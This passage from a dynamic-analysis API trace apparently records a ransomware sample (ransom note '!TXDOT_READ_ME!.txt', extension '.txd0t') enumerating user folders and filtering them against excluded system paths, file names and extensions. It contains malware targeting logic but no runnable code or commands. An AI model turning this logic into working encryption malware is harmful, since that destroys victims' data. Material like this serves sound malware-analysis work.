(lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="crypt_detect") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="cryptolocker") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="ransomware") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\WINDOWS") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files") returned 0x0 [0076.356] GetProcessHeap () returned 0xe30000 [0076.356] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed0058 [0076.356] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0076.356] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\*") returned="C:\\Users\\FD1HVy\\Searches\\*" [0076.356] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2470 [0076.356] StrCmpW (psz1=".", psz2=".") returned 0 [0076.356] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.357] StrCmpW (psz1="..", psz2=".") returned 1 [0076.357] StrCmpW (psz1="..", psz2="..") returned 0 [0076.357] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.357] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0076.357] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0076.357] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44269063, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44269063, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44269063, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0076.357] StrCmpW (psz1="Everywhere.search-ms", psz2=".") returned 1 [0076.357] StrCmpW (psz1="Everywhere.search-ms", psz2="..") returned 1 [0076.357] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0076.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0076.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Everywhere.search-ms", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms") returned="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" [0076.357] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0076.357] StrCmpW (psz1=".search-ms", psz2=".txd0t") returned -1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="bootsect.bak") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="iconcache.db") returned -1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="thumbs.db") returned -1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2=" ransomware ") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2=" ransom ") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="debug.txt") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="boot.ini") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="desktop.ini") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="autorun.inf") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="ntuser.dat") returned -1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="ntldr") returned -1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="ntdetect.com") returned -1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="bootfont.bin") returned 1 [0076.357] StrCmpIW (psz1="Everywhere.search-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.357] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0076.357] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".search-ms") returned 0x0 [0076.357] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.357] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.357] FileTimeToSystemTime (in: lpFileTime=0x552f454, lpSystemTime=0x552f418 | out: lpSystemTime=0x552f418) returned 1 [0076.358] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f418, lpLocalTime=0x552f428 | out: lpLocalTime=0x552f428) returned 1 [0076.358] FileTimeToSystemTime (in: lpFileTime=0x552f45c, lpSystemTime=0x552f3e0 | out: lpSystemTime=0x552f3e0) returned 1 [0076.358] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f3e0, lpLocalTime=0x552f3d0 | out: lpLocalTime=0x552f3d0) returned 1 [0076.358] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44242e24, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44242e24, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44242e24, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0076.358] StrCmpW (psz1="Indexed Locations.search-ms", psz2=".") returned 1 [0076.358] StrCmpW (psz1="Indexed Locations.search-ms", psz2="..") returned 1 [0076.358] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0076.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0076.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Indexed Locations.search-ms", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" [0076.358] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0076.358] StrCmpW (psz1=".search-ms", psz2=".txd0t") returned -1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="bootsect.bak") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="iconcache.db") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="thumbs.db") returned -1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2=" ransomware ") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2=" ransom ") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="debug.txt") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="boot.ini") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="desktop.ini") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="autorun.inf") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="ntuser.dat") returned -1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="ntldr") returned -1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="ntdetect.com") returned -1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="bootfont.bin") returned 1 [0076.358] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.358] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0076.358] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".search-ms") returned 0x0 [0076.358] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.358] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.407] FileTimeToSystemTime (in: lpFileTime=0x552f454, lpSystemTime=0x552f418 | out: lpSystemTime=0x552f418) returned 1 [0076.407] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f418, lpLocalTime=0x552f428 | out: lpLocalTime=0x552f428) returned 1 [0076.407] FileTimeToSystemTime (in: lpFileTime=0x552f45c, lpSystemTime=0x552f3e0 | out: lpSystemTime=0x552f3e0) returned 1 [0076.407] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f3e0, lpLocalTime=0x552f3d0 | out: lpLocalTime=0x552f3d0) returned 1 [0076.407] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 1 [0076.407] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2=".") returned 1 [0076.407] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="..") returned 1 [0076.407] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0076.407] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0076.407] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0076.407] PathFindExtensionW (pszPath="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned=".searchconnector-ms" [0076.407] StrCmpW (psz1=".searchconnector-ms", psz2=".txd0t") returned -1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="bootsect.bak") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="iconcache.db") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="thumbs.db") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2=" ransomware ") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2=" ransom ") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="debug.txt") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="boot.ini") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="desktop.ini") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="autorun.inf") returned 1 [0076.407] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="ntuser.dat") returned 1 [0076.408] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="ntldr") returned 1 [0076.408] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="ntdetect.com") returned 1 [0076.408] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="bootfont.bin") returned 1 [0076.408] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.408] PathFindExtensionW (pszPath="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned=".searchconnector-ms" [0076.408] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".searchconnector-ms") returned 0x0 [0076.408] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.408] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.408] FileTimeToSystemTime (in: lpFileTime=0x552f454, lpSystemTime=0x552f418 | out: lpSystemTime=0x552f418) returned 1 [0076.408] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f418, lpLocalTime=0x552f428 | out: lpLocalTime=0x552f428) returned 1 [0076.408] FileTimeToSystemTime (in: lpFileTime=0x552f45c, lpSystemTime=0x552f3e0 | out: lpSystemTime=0x552f3e0) returned 1 [0076.408] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f3e0, lpLocalTime=0x552f3d0 | out: lpLocalTime=0x552f3d0) returned 1 [0076.408] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 0 [0076.408] FindClose (in: hFindFile=0xec2470 | out: hFindFile=0xec2470) returned 1 [0076.408] GetProcessHeap () returned 0xe30000 [0076.408] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0076.408] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0076.408] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0076.408] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0076.408] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0076.408] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0076.408] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0076.408] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0076.408] StrCmpW (psz1="Templates", psz2=".") returned 1 [0076.409] StrCmpW (psz1="Templates", psz2="..") returned 1 [0076.409] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5e11778, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5e11778, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0076.409] StrCmpW (psz1="Videos", psz2=".") returned 1 [0076.409] StrCmpW (psz1="Videos", psz2="..") returned 1 [0076.409] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0076.409] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0076.409] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\boot\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="crypt_detect") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="cryptolocker") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="ransomware") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.409] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0076.409] GetProcessHeap () returned 0xe30000 [0076.409] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xed0058 [0076.410] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.410] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\*") returned="C:\\Users\\FD1HVy\\Videos\\*" [0076.410] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5e11778, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5e11778, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22f0 [0076.410] StrCmpW (psz1=".", psz2=".") returned 0 [0076.410] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5e11778, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5e11778, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.410] StrCmpW (psz1="..", psz2=".") returned 1 [0076.410] StrCmpW (psz1="..", psz2="..") returned 0 [0076.410] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827a210, ftCreationTime.dwHighDateTime=0x1d5e8fe, ftLastAccessTime.dwLowDateTime=0xb0bf66b0, ftLastAccessTime.dwHighDateTime=0x1d5e719, ftLastWriteTime.dwLowDateTime=0xb0bf66b0, ftLastWriteTime.dwHighDateTime=0x1d5e719, nFileSizeHigh=0x0, nFileSizeLow=0x18da8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="42OnoQ2VRBixgPOTlYl.avi", cAlternateFileName="42ONOQ~1.AVI")) returned 1 [0076.410] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2=".") returned 1 [0076.410] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="..") returned 1 [0076.410] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.410] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0076.410] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="42OnoQ2VRBixgPOTlYl.avi", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi") returned="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" [0076.410] PathFindExtensionW (pszPath="42OnoQ2VRBixgPOTlYl.avi") returned=".avi" [0076.410] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="bootsect.bak") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="iconcache.db") returned -1 [0076.410] StrCmpIW 